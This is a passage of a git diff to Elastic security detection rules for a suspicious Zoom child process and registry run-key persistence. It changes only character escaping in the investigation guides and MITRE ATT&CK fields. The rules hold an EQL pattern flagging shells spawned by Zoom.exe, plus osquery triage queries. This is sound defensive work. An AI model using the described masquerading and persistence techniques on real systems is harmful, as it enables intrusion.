modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal 
Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Suspicious Zoom Child Process\n\nBy examining the specific traits of Windows binaries -- such as process trees, command lines, network connections, registry modifications, and so on -- it's possible to establish a baseline of normal activity. Deviations from this baseline can indicate malicious activity, such as masquerading, and deserve further investigation.\n\nThis rule identifies a potential malicious process masquerading as `Zoom.exe` or exploiting a vulnerability in the application causing it to execute code.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the command line of the child process to determine which commands or scripts were executed.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal 
Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"Zoom.exe\" and process.name : (\"cmd.exe\", \"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\")\n", "related_integrations": [ { @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/97aba1ef-6034-4bd3-8c1a-1e0996b27afa_107.json b/packages/security_detection_engine/kibana/security_rule/97aba1ef-6034-4bd3-8c1a-1e0996b27afa_107.json index ed17482a0c8..ed8c14b201c 100644 --- a/packages/security_detection_engine/kibana/security_rule/97aba1ef-6034-4bd3-8c1a-1e0996b27afa_107.json +++ b/packages/security_detection_engine/kibana/security_rule/97aba1ef-6034-4bd3-8c1a-1e0996b27afa_107.json 
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious Zoom Child Process", - "note": "## Triage and analysis\n\n### Investigating Suspicious Zoom Child Process\n\nBy examining the specific traits of Windows binaries -- such as process trees, command lines, network connections, registry modifications, and so on -- it's possible to establish a baseline of normal activity. Deviations from this baseline can indicate malicious activity, such as masquerading, and deserve further investigation.\n\nThis rule identifies a potential malicious process masquerading as `Zoom.exe` or exploiting a vulnerability in the application causing it to execute code.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the command line of the child process to determine which commands or scripts were executed.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal 
Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Suspicious Zoom Child Process\n\nBy examining the specific traits of Windows binaries -- such as process trees, command lines, network connections, registry modifications, and so on -- it's possible to establish a baseline of normal activity. Deviations from this baseline can indicate malicious activity, such as masquerading, and deserve further investigation.\n\nThis rule identifies a potential malicious process masquerading as `Zoom.exe` or exploiting a vulnerability in the application causing it to execute code.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the command line of the child process to determine which commands or scripts were executed.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal 
Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"Zoom.exe\" and process.name : (\"cmd.exe\", \"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\")\n", "related_integrations": [ { @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/97aba1ef-6034-4bd3-8c1a-1e0996b27afa_108.json b/packages/security_detection_engine/kibana/security_rule/97aba1ef-6034-4bd3-8c1a-1e0996b27afa_108.json index d7b825620a8..0376915f222 100644 --- a/packages/security_detection_engine/kibana/security_rule/97aba1ef-6034-4bd3-8c1a-1e0996b27afa_108.json +++ b/packages/security_detection_engine/kibana/security_rule/97aba1ef-6034-4bd3-8c1a-1e0996b27afa_108.json 
@@ -14,7 +14,7 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Suspicious Zoom Child Process",
- "note": "## Triage and analysis\n\n### Investigating Suspicious Zoom Child Process\n\nBy examining the specific traits of Windows binaries -- such as process trees, command lines, network connections, registry modifications, and so on -- it's possible to establish a baseline of normal activity. Deviations from this baseline can indicate malicious activity, such as masquerading, and deserve further investigation.\n\nThis rule identifies a potential malicious process masquerading as `Zoom.exe` or exploiting a vulnerability in the application causing it to execute code.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the command line of the child process to determine which commands or scripts were executed.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal 
Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
+ "note": "## Triage and analysis\n\n### Investigating Suspicious Zoom Child Process\n\nBy examining the specific traits of Windows binaries -- such as process trees, command lines, network connections, registry modifications, and so on -- it's possible to establish a baseline of normal activity. Deviations from this baseline can indicate malicious activity, such as masquerading, and deserve further investigation.\n\nThis rule identifies a potential malicious process masquerading as `Zoom.exe` or exploiting a vulnerability in the application causing it to execute code.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the command line of the child process to determine which commands or scripts were executed.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal 
Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
 "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"Zoom.exe\" and process.name : (\"cmd.exe\", \"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\")\n",
 "related_integrations": [
 {
@@ -63,7 +63,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
@@ -83,7 +83,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/97db8b42-69d8-4bf3-9fd4-c69a1d895d68_1.json b/packages/security_detection_engine/kibana/security_rule/97db8b42-69d8-4bf3-9fd4-c69a1d895d68_1.json
index 02940c82197..6ac883e8ec6 100644
--- a/packages/security_detection_engine/kibana/security_rule/97db8b42-69d8-4bf3-9fd4-c69a1d895d68_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/97db8b42-69d8-4bf3-9fd4-c69a1d895d68_1.json
@@ -55,7 +55,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/97db8b42-69d8-4bf3-9fd4-c69a1d895d68_2.json b/packages/security_detection_engine/kibana/security_rule/97db8b42-69d8-4bf3-9fd4-c69a1d895d68_2.json
index 1f87aa7860b..cb572f9e7f0 100644
--- a/packages/security_detection_engine/kibana/security_rule/97db8b42-69d8-4bf3-9fd4-c69a1d895d68_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/97db8b42-69d8-4bf3-9fd4-c69a1d895d68_2.json
@@ -54,7 +54,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/97db8b42-69d8-4bf3-9fd4-c69a1d895d68_3.json b/packages/security_detection_engine/kibana/security_rule/97db8b42-69d8-4bf3-9fd4-c69a1d895d68_3.json
index eddda14d46b..2a6c2a0124f 100644
--- a/packages/security_detection_engine/kibana/security_rule/97db8b42-69d8-4bf3-9fd4-c69a1d895d68_3.json
+++ b/packages/security_detection_engine/kibana/security_rule/97db8b42-69d8-4bf3-9fd4-c69a1d895d68_3.json
@@ -55,7 +55,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/97db8b42-69d8-4bf3-9fd4-c69a1d895d68_4.json b/packages/security_detection_engine/kibana/security_rule/97db8b42-69d8-4bf3-9fd4-c69a1d895d68_4.json
index ed88da3e7cb..c97b818e8ad 100644
--- a/packages/security_detection_engine/kibana/security_rule/97db8b42-69d8-4bf3-9fd4-c69a1d895d68_4.json
+++ b/packages/security_detection_engine/kibana/security_rule/97db8b42-69d8-4bf3-9fd4-c69a1d895d68_4.json
@@ -56,7 +56,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/97db8b42-69d8-4bf3-9fd4-c69a1d895d68_5.json b/packages/security_detection_engine/kibana/security_rule/97db8b42-69d8-4bf3-9fd4-c69a1d895d68_5.json
index d99dabf258c..5fb8ab9ac0b 100644
--- a/packages/security_detection_engine/kibana/security_rule/97db8b42-69d8-4bf3-9fd4-c69a1d895d68_5.json
+++ b/packages/security_detection_engine/kibana/security_rule/97db8b42-69d8-4bf3-9fd4-c69a1d895d68_5.json
@@ -56,7 +56,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/97fc44d3-8dae-4019-ae83-298c3015600f_104.json b/packages/security_detection_engine/kibana/security_rule/97fc44d3-8dae-4019-ae83-298c3015600f_104.json
index 903b1a2ebdf..3169fbd3a9d 100644
--- a/packages/security_detection_engine/kibana/security_rule/97fc44d3-8dae-4019-ae83-298c3015600f_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/97fc44d3-8dae-4019-ae83-298c3015600f_104.json
@@ -12,7 +12,7 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Startup or Run Key Registry Modification",
- "note": "## Triage and analysis\n\n### Investigating Startup or Run Key Registry Modification\n\nAdversaries may achieve persistence by referencing a program with a registry run key. Adding an entry to the run keys in the registry will cause the program referenced to be executed when a user logs in. These programs will executed under the context of the user and will have the account's permissions. This rule looks for this behavior by monitoring a range of registry run keys.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- There is a high possibility of benign legitimate programs being added to registry run keys. This activity could be based on new software installations, patches, or any kind of network administrator related activity. 
Before undertaking further investigation, verify that this activity is not benign.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n- Startup Folder Persistence via Unsigned Process - 2fba96c0-ade5-4bce-b92f-a5df2509da3f\n- Startup Persistence by a Suspicious Process - 440e2db4-bc7f-4c96-a068-65b78da59bde\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
